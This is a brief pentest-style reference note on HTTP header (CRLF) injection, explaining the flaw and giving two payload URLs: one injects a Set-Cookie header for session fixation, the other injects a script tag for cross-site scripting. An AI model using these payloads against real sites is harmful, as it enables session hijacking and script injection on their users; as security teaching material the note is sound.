HTTP Header Injection

If the target site inserts user provided value into the response header without sanitizing, attacker may inject arbitrary key/value.

Exploit

By inserting \r\n (URL encoded: %0d%0a ), we may inject arbitrary header value in the response.

# Inject "\r\nSet-Cookie: sessionid=123456" into the response header
/?origin=example%0d%0aSet-Cookie: SESSID%3d123456


Exploit (XSS)

/?origin=example%0d%0a<html><script>alert(1)</script>